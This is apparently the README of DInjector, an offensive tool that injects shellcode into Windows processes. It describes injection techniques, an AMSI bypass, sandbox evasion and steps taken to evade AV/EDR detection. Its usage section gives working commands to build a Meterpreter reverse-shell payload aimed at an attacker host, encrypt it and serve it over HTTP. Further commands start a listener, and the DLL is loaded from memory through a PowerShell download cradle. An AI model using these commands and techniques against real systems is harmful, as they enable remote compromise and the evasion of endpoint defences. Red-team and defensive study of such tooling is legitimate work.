DInjector: Collection of shellcode injection techniques
- Fully ported to D/Invoke API.
- Encrypted payloads which can be invoked from a URL or passed in base64 as an argument.
- Built-in AMSI bypass based on @rasta-mouse method.
- Sandbox detection & evasion.
ℹ️ Based on my testings the DInvoke NuGet package itself is being flagged by many commercial AV/EDR solutions when included as an embedded resource via Costura.Fody (or similar approaches), so I’ve shrinked it a bit and included from source to achieve better OpSec.
- FunctionPointer Allocates an RWX memory region, copies the shellcode into it, and executes it like a function.
- FunctionPointerV2 Sets RWX on a byte array and executes it like a function.
- CurrentThread Injects shellcode into the current process. Thread execution via NtCreateThreadEx.
- RemoteThread Injects shellcode into an existing remote process. Thread execution via NtCreateThreadEx.
- RemoteThreadSuspended Injects shellcode into an existing remote process and flips memory protection to PAGE_NOACCESS. After a short sleep (waiting until a possible AV scan is finished) the protection is flipped again to PAGE_EXECUTE_READ. Thread execution via NtCreateThreadEx.
- RemoteThreadAPC Injects shellcode into a newly spawned remote process. Thread execution via NtQueueApcThread.
- RemoteThreadContext Injects shellcode into a newly spawned remote process. Thread execution via SetThreadContext.
- ProcessHollow Injects shellcode into a newly spawned remote process. Thread execution via NtResumeThread (hollowing with shellcode).
git clone https://github.com/snovvcrash/DInjector.git
- Compile the project in VS.
- Generate a shellcode for your favourite C2:
~$ msfvenom -p windows/x64/meterpreter/reverse_winhttps LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f raw -o shellcode.bin
- Encrypt the shellcode:
~$ encrypt.py shellcode.bin -p 'Passw0rd!' -o enc
- Serve the encrypted shellcode and prepare C2 listener:
~$ sudo python3 -m http.server 80
~$ sudo msfconsole -qx “use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_winhttps; set lhost 10.10.13.37; set lport 443; set EXITFUNC thread; run”
- Use the PowerShell download cradle to load DInjector.dll as System.Reflection.Assembly and execute it from memory.
Required global arguments:
|/am51||true, false||Applies AMSI bypass|
|/sc||http://10.10.13.37/enc||Sets shellcode path (can be loaded from URL or as a Base64 string)|
|/password||Passw0rd!||Sets password to decrypt the shellcode|
Copyright (c) 2021, snovvcrash
All rights reserved.